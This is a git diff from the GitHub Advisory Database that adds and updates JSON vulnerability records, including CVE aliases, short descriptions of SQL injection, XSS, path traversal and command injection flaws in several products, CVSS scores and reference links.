diff --git a/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json b/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json
index ce0a3de84e30d..e6aeeaa52e82e 100644
--- a/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json
+++ b/advisories/unreviewed/2025/12/GHSA-rw74-fqrf-pr2q/GHSA-rw74-fqrf-pr2q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rw74-fqrf-pr2q",
- "modified": "2025-12-14T18:31:30Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-14T18:31:30Z",
 "aliases": [
 "CVE-2025-14673"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14673"
 },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/gmg137/snap7-rs"
+ },
 {
 "type": "WEB",
 "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H74"
diff --git a/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json b/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json
index 705bb83b2535b..e3cf939146a8f 100644
--- a/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json
+++ b/advisories/unreviewed/2025/12/GHSA-vjgx-vcpf-hm6w/GHSA-vjgx-vcpf-hm6w.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vjgx-vcpf-hm6w",
- "modified": "2025-12-19T18:31:18Z",
+ "modified": "2026-02-24T06:31:30Z",
 "published": "2025-12-19T18:31:18Z",
 "aliases": [
 "CVE-2025-14956"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/WebAssembly/binaryen/commit/4f52bff8c4075b5630422f902dd92a0af2c9f398"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/WebAssembly/binaryen"
+ },
 {
 "type": "WEB",
 "url": "https://github.com/oneafter/1204/blob/main/hbf"
diff --git a/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json b/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json
new file mode 100644
index 0000000000000..7f44aed92b5ee
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3grc-c2rj-3qj5/GHSA-3grc-c2rj-3qj5.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3grc-c2rj-3qj5",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-24314"
+ ],
+ "details": "Under certain conditions SAP S/4HANA (Manage Payment Media) allows an authenticated attacker to access information which would otherwise be restricted. This could cause low impact on confidentiality of the application while integrity and availability are not impacted.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24314"
+ },
+ {
+ "type": "WEB",
+ "url": "https://me.sap.com/notes/3646297"
+ },
+ {
+ "type": "WEB",
+ "url": "https://url.sap/sapsecuritypatchday"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-497"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T06:16:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json b/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json
new file mode 100644
index 0000000000000..ec545a0d406a6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-83rq-88jr-634x/GHSA-83rq-88jr-634x.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-83rq-88jr-634x",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2025-15589"
+ ],
+ "details": "A vulnerability was determined in MuYuCMS 2.7. Affected is the function delete_dir_file of the file application/admin/controller/Template.php of the component Template Management Page. This manipulation of the argument temn/tp causes path traversal. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15589"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/b1uel0n3/275ac353537ecf4c8973d33fa0d5b0fe#proof-of-concept"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.336710"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.336710"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.702489"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json b/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json
new file mode 100644
index 0000000000000..2eb0455470f08
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-cxmx-5wwh-7p77/GHSA-cxmx-5wwh-7p77.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cxmx-5wwh-7p77",
+ "modified": "2026-02-24T06:31:31Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-3070"
+ ],
+ "details": "A vulnerability was detected in SourceCodester Modern Image Gallery App 1.0. Affected by this vulnerability is an unknown functionality of the file upload.php. The manipulation of the argument filename results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3070"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tiancesec/CVE/issues/28"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347425"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347425"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757768"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.sourcecodester.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T05:17:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json b/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json
new file mode 100644
index 0000000000000..816ca9edf4bde
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fwq6-2c4r-9g8h/GHSA-fwq6-2c4r-9g8h.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fwq6-2c4r-9g8h",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-3068"
+ ],
+ "details": "A weakness has been identified in itsourcecode Document Management System 1.0. This impacts an unknown function of the file /deluser.php. Executing a manipulation of the argument user2del can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3068"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ltranquility/cve_submit/issues/4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347423"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347423"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757742"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T04:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json b/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json
new file mode 100644
index 0000000000000..2f00150a30807
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mcwp-v5q8-7gcp/GHSA-mcwp-v5q8-7gcp.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mcwp-v5q8-7gcp",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2025-15386"
+ ],
+ "details": "The Responsive Lightbox & Gallery WordPress plugin before 2.6.1 is vulnerable to an Unauthenticated Stored-XSS attack due to flawed regex replacement rules that can be abused by posting a comment with a malicious link when lightbox for comments are enabled and then approved.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15386"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wpscan.com/vulnerability/fa3a84b6-6d5d-4e10-8587-ae49c127483b"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json b/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json
new file mode 100644
index 0000000000000..ffd66e3a1952e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-p86v-p9g7-fffw/GHSA-p86v-p9g7-fffw.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-p86v-p9g7-fffw",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-3067"
+ ],
+ "details": "A vulnerability has been found in HummerRisk up to 1.5.0. This issue affects the function extractTarGZ/extractZip of the file hummer-common/hummer-common-core/src/main/java/com/hummer/common/core/utils/CommandUtils.java of the component Archive Extraction. The manipulation leads to path traversal. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3067"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347418"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347418"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757763"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T04:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json b/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json
new file mode 100644
index 0000000000000..cad52f7c99343
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rx2f-c6vf-gmg2/GHSA-rx2f-c6vf-gmg2.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rx2f-c6vf-gmg2",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-3066"
+ ],
+ "details": "A flaw has been found in HummerRisk up to 1.5.0. This vulnerability affects the function fixedCommand of the file hummer-common/hummer-common-core/src/main/java/com/hummer/common/core/utils/PlatformUtils.java of the component Cloud Compliance Scanning. Executing a manipulation can lead to command injection. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3066"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/AnalogyC0de/public_exp/issues/10"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347417"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347417"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757704"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T04:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json b/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json
new file mode 100644
index 0000000000000..5a105f235bead
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wgpr-jxrq-2m57/GHSA-wgpr-jxrq-2m57.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wgpr-jxrq-2m57",
+ "modified": "2026-02-24T06:31:30Z",
+ "published": "2026-02-24T06:31:30Z",
+ "aliases": [
+ "CVE-2026-3069"
+ ],
+ "details": "A security vulnerability has been detected in itsourcecode Document Management System 1.0. Affected is an unknown function of the file /edtlbls.php. The manipulation of the argument field1 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3069"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/ltranquility/cve_submit/issues/5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://itsourcecode.com"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347424"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347424"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.757746"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-24T05:17:18Z"
+ }
+}
\ No newline at end of file
From 19beec907b8e1b8490e0b828ba7109cc356d5dd1 Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 24 Feb 2026 09:32:31 +0000 Subject: [PATCH 75/77] Advisory Database Sync --- .../GHSA-g7xr-56w3-vjqh.json | 6 ++- .../GHSA-284q-85q8-xhhq.json | 6 ++- .../GHSA-72q5-998j-vg7r.json | 6 ++- .../GHSA-87xj-ghmc-c3xq.json | 6 ++- .../GHSA-cfvm-7f4p-fg84.json | 6 ++- .../GHSA-fjfr-qh36-wf3q.json | 6 ++- .../GHSA-fw46-27g2-vm4h.json | 6 ++- .../GHSA-fwc5-xhrg-wx5f.json | 6 ++- .../GHSA-w337-wphv-g4vh.json | 6 ++- .../GHSA-wmcg-whfp-429v.json | 6 ++- .../GHSA-462x-7r4x-p5hx.json | 6 ++- .../GHSA-5pqw-p5hq-5f98.json | 6 ++- .../GHSA-6764-r2xh-qmhg.json | 10 ++++- .../GHSA-69hw-6qrh-77rw.json | 6 ++- .../GHSA-9m86-pmxw-268g.json | 6 ++- .../GHSA-c9jg-5vh8-ff2v.json | 6 ++- .../GHSA-j383-q79v-268x.json | 6 ++- .../GHSA-mfg3-2r9j-5hv9.json | 6 ++- .../GHSA-q269-xqww-45mm.json | 6 ++- .../GHSA-q53m-jpj6-g58x.json | 6 ++- .../GHSA-vwmr-4hph-3f4r.json | 6 ++- .../GHSA-229x-w52j-6f5m.json | 6 ++- .../GHSA-9492-pwhm-prgg.json | 6 ++- .../GHSA-f342-w736-j52r.json | 6 ++- .../GHSA-hg49-2rqm-p9hf.json | 6 ++- .../GHSA-w2jm-qqhw-c9px.json | 6 ++- .../GHSA-w944-w7q2-5fv6.json | 6 ++- .../GHSA-xh4m-g9pq-wh25.json | 6 ++- .../GHSA-8cmg-xf32-xmvr.json | 40 +++++++++++++++++++ .../GHSA-hwvv-m8xc-26x2.json | 36 +++++++++++++++++ .../GHSA-jjx5-vcwr-cwfq.json | 40 +++++++++++++++++++ .../GHSA-p4xj-mrqw-g3f3.json | 36 +++++++++++++++++ .../GHSA-vh45-gfxf-vr42.json | 40 +++++++++++++++++++ .../GHSA-x366-cwf7-x9gv.json | 40 +++++++++++++++++++ 34 files changed, 376 insertions(+), 28 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-x366-cwf7-x9gv/GHSA-x366-cwf7-x9gv.json
diff --git a/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json b/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json
index 677695f32494d..887d472f48274 100644
--- a/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json
+++ b/advisories/unreviewed/2022/04/GHSA-g7xr-56w3-vjqh/GHSA-g7xr-56w3-vjqh.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g7xr-56w3-vjqh",
- "modified": "2022-04-30T18:09:55Z",
+ "modified": "2026-02-24T09:31:12Z",
 "published": "2022-04-30T18:09:55Z",
 "aliases": [
 "CVE-1999-0073"
@@ -17,6 +17,10 @@
 {
 "type": "WEB",
 "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/CVE-1999-0073"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2026/02/24/3"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json b/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json
index bb11611d2e65b..2b87b9fa9f019 100644
--- a/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json
+++ b/advisories/unreviewed/2025/10/GHSA-284q-85q8-xhhq/GHSA-284q-85q8-xhhq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-284q-85q8-xhhq",
- "modified": "2025-10-08T15:32:27Z",
+ "modified": "2026-02-24T09:31:13Z",
 "published": "2025-10-08T15:32:27Z",
 "aliases": [
 "CVE-2025-11475"
@@ -38,6 +38,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.667107"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.703085"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json b/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json
index 668acb23ec59b..1bce62ee6a2b4 100644
--- a/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json
+++ b/advisories/unreviewed/2025/10/GHSA-72q5-998j-vg7r/GHSA-72q5-998j-vg7r.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-72q5-998j-vg7r",
- "modified": "2025-10-27T09:30:15Z",
+ "modified": "2026-02-24T09:31:14Z",
 "published": "2025-10-27T09:30:15Z",
 "aliases": [
 "CVE-2025-12236"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.673724"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.721455"
+ },
 {
 "type": "WEB",
 "url": "https://www.tenda.com.cn"
diff --git a/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json b/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json
index 4028ec925e70f..d126b89857fdf 100644
--- a/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json
+++ b/advisories/unreviewed/2025/10/GHSA-87xj-ghmc-c3xq/GHSA-87xj-ghmc-c3xq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-87xj-ghmc-c3xq",
- "modified": "2025-10-10T18:31:24Z",
+ "modified": "2026-02-24T09:31:14Z",
 "published": "2025-10-10T18:31:23Z",
 "aliases": [
 "CVE-2025-11580"
@@ -27,6 +27,10 @@
 "type": "WEB",
 "url": "https://github.com/PowerJob/PowerJob/issues/1127"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/PowerJob/PowerJob"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.327902"
diff --git a/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json b/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json
index 8803f579f79f8..72a1b08e0adee 100644
--- a/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json
+++ b/advisories/unreviewed/2025/10/GHSA-cfvm-7f4p-fg84/GHSA-cfvm-7f4p-fg84.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-cfvm-7f4p-fg84",
- "modified": "2025-10-27T03:30:39Z",
+ "modified": "2026-02-24T09:31:14Z",
 "published": "2025-10-27T03:30:39Z",
 "aliases": [
 "CVE-2025-12203"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/givanz/Vvveb/commit/b0fa7ff74a3539c6d37000db152caad572e4c39b"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/givanz/Vvveb"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.329873"
diff --git a/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json b/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json
index c78d89ee95c37..d04bfc24aa105 100644
--- a/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json
+++ b/advisories/unreviewed/2025/10/GHSA-fjfr-qh36-wf3q/GHSA-fjfr-qh36-wf3q.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fjfr-qh36-wf3q",
- "modified": "2025-10-05T12:30:24Z",
+ "modified": "2026-02-24T09:31:12Z",
 "published": "2025-10-05T12:30:24Z",
 "aliases": [
 "CVE-2025-11289"
@@ -38,6 +38,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.659789"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.709804"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json b/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json
index 168de496ab90e..15b818de18bbb 100644
--- a/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json
+++ b/advisories/unreviewed/2025/10/GHSA-fw46-27g2-vm4h/GHSA-fw46-27g2-vm4h.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fw46-27g2-vm4h",
- "modified": "2025-10-07T12:31:16Z",
+ "modified": "2026-02-24T09:31:13Z",
 "published": "2025-10-07T12:31:16Z",
 "aliases": [
 "CVE-2025-11390"
@@ -42,6 +42,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.664984"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.665028"
